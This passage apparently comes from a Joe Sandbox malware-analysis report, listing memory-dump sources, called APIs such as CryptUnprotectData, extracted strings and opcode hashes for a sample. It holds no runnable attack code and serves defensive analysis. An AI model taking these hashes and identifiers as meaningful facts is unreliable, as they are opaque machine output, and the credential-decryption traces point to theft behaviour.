                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: %-k$@0Wu$yUqi
                                      • API String ID: 0-1606714035
                                      • Opcode ID: ecc7c27bac0fd1f2bfa2ec5fed4d9afab595674e7cca8f93b721e66fb610041e
                                      • Instruction ID: 61247781b99e76d93c05c1d32fd480118d419d0e7dab10bb880dbb2c3e8b82ff
                                      • Opcode Fuzzy Hash: ecc7c27bac0fd1f2bfa2ec5fed4d9afab595674e7cca8f93b721e66fb610041e
                                      • Instruction Fuzzy Hash: B8B2FAF390C200AFE304AE2DDC8567AB7E9EF94720F1A893DE6C5C7744E63598418697
                                      APIs
                                      • CoCreateInstance.COMBASE(0012E120,00000000,00000001,0012E110,00000000), ref: 001239A8
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00123A00
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharCreateInstanceMultiWide
                                      • String ID:
                                      • API String ID: 123533781-0
                                      • Opcode ID: 10bfbd2a722824f43847dc9c22712b57cb19f6a93c89a4ef8fe209a0773fa1fd
                                      • Instruction ID: fd21155fc7d61d74356f0d4dd65c848be42e75e928700c089030e55da9e986b6
                                      • Opcode Fuzzy Hash: 10bfbd2a722824f43847dc9c22712b57cb19f6a93c89a4ef8fe209a0773fa1fd
                                      • Instruction Fuzzy Hash: 7741E870A40A289FDB24DB58DC95F9BB7B5BB48702F4042D8E618EB2D0D7B16E85CF50
                                      APIs
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0011A2D4
                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 0011A2F3
                                      • LocalFree.KERNEL32(?), ref: 0011A323
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$AllocCryptDataFreeUnprotect
                                      • String ID:
                                      • API String ID: 2068576380-0
                                      • Opcode ID: b6e1d09923d85d9a5ef1dd3f34bcc361425c46d6c6906b4de8f1888b4a252951
                                      • Instruction ID: 2e9786161c10b5949d28e92842d4a687bfb2beefff963b7f29113b3b9ef62202
                                      • Opcode Fuzzy Hash: b6e1d09923d85d9a5ef1dd3f34bcc361425c46d6c6906b4de8f1888b4a252951
                                      • Instruction Fuzzy Hash: 4C11A8B8A01209DFCB05DFA4D985AAEB7B9FF89300F108569ED159B390D770AE50CB61
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: ?$__ZN
                                      • API String ID: 0-1427190319
                                      • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                      • Instruction ID: f3ba539fe077b31e5a4df7bd8ca550ccd915738790bc07074739c9fd6320cf08
                                      • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                      • Instruction Fuzzy Hash: CA722272908B118BD718DF18C89066ABBE3FFD5310F698A1DF8A55B291D770DE418F82
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: xn--
                                      • API String ID: 0-2826155999
                                      • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                      • Instruction ID: f823360e6a477521aa724823e8f579b20627b8a314f0523c033f8d06a10440ce
                                      • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                      • Instruction Fuzzy Hash: 31A203B2D042688AEF18CB68CCA03FDBBB1FF55300F1842AAD5567B281D7755EA5CB50
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv
                                      • String ID:
                                      • API String ID: 3732870572-0
                                      • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                      • Instruction ID: 6e314019ae3813d63b54e18244dad69c9f856384b7b6bd6c1474fdde4ed1b9f1
                                      • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                      • Instruction Fuzzy Hash: 6FE1D0316083419FC725DF28C8917AFB7E2EFCA300F558A2DE5D99B291D7319865CB82
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv
                                      • String ID:
                                      • API String ID: 3732870572-0
                                      • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                      • Instruction ID: 15c1bfab1b5801c4ffce37e2541f5829a0702df6dc83cd6636e0a82ce82e7c8d
                                      • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                      • Instruction Fuzzy Hash: 87E1D231A083119FDB24CE58CC917AEB7E6EFC9314F158A2DE88A9B251D730EC55CB46
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: UNC\
                                      • API String ID: 0-505053535
                                      • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                      • Instruction ID: 04976d661779b15e17ffe1f37ab0ac41802ff8938637e9ac5deda3d9d866ce78
                                      • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                      • Instruction Fuzzy Hash: 74E11A71D042658EEB148F19C8843BEBBF2AB8D314F19C1E9D4AD9F292D7358D46CB90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: {'}
                                      • API String ID: 0-2617744002
                                      • Opcode ID: cee7e1663d9a4918b323b4791d0976c9684b39dbb7d5abba3da7b36ab6c5b209
                                      • Instruction ID: 8055e03dcc02b1b812e31af7a4a5b741f88d90853dd0695c39ffe366f005c246
                                      • Opcode Fuzzy Hash: cee7e1663d9a4918b323b4791d0976c9684b39dbb7d5abba3da7b36ab6c5b209
                                      • Instruction Fuzzy Hash: D07135F3F046045BF304592ADD8877AB7DBEBC4720F2B853DDA8897784E83E590A4295
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: Ehtv
                                      • API String ID: 0-964658544
                                      • Opcode ID: 938c77dffa2d9351e67c3f57f0caaaea72bb5199d29104c01663518de83ea2b6
                                      • Instruction ID: 124f3e551122a72e7dd468c23acd20b22f8593e1d18270e0112ecb778e488ebe
                                      • Opcode Fuzzy Hash: 938c77dffa2d9351e67c3f57f0caaaea72bb5199d29104c01663518de83ea2b6
                                      • Instruction Fuzzy Hash: 6A511DF36187048BE7006E2DECC476ABBD6EBD4324F2A853DDAC487784E93958058786
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: P[
                                      • API String ID: 0-4286110700
                                      • Opcode ID: edf3cd78a0c8099baf92f0611f0d91f6f71d3b26a4e912440b2a678204c589e9
                                      • Instruction ID: 216ac2c3aa9cd8e01ab3c6bf52eb8b3d7ddc15f20a9f40d987d3bcf2a9874542
                                      • Opcode Fuzzy Hash: edf3cd78a0c8099baf92f0611f0d91f6f71d3b26a4e912440b2a678204c589e9
                                      • Instruction Fuzzy Hash: 1C41E3F380C2249BE3146F29EC8176AFBE8EB14360F17453DEAD5D3744E53558148A96
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                      • Instruction ID: 6b2f6dd49d3e670927177cb1e3206babd42d0039499a547e4a725f0fb0e2689c
                                      • Opcode Fuzzy Hash: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                      • Instruction Fuzzy Hash: CE82E1B5A00F448FD765CF29C880B92B7F1BF5A300F548A2ED9EA9B651DB30B545CB90
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                      • Instruction ID: c1ba8e2be7758aec2c0d5183603e17cf5946a4caff29830edb560c677aee65a8
                                      • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                      • Instruction Fuzzy Hash: 8F42B070604741CFC729CF19C090665BBE2BF49312F298A6ED8A68F791D735E88DCB52
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                      • Instruction ID: 66c6191271246533bf028956928edf1ecbde30b779f313672594667eb346b88c
                                      • Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                      • Instruction Fuzzy Hash: 81021771E042168FDB15DF68C8906BFB7E2AFAA340F56831AE815B7251D770AE418BD0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                      • Instruction ID: 8799f6cf8c713e7cbe4611a586f0b692d1ab49f1505688aba724d67ef6f37a4a
                                      • Opcode Fuzzy Hash: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
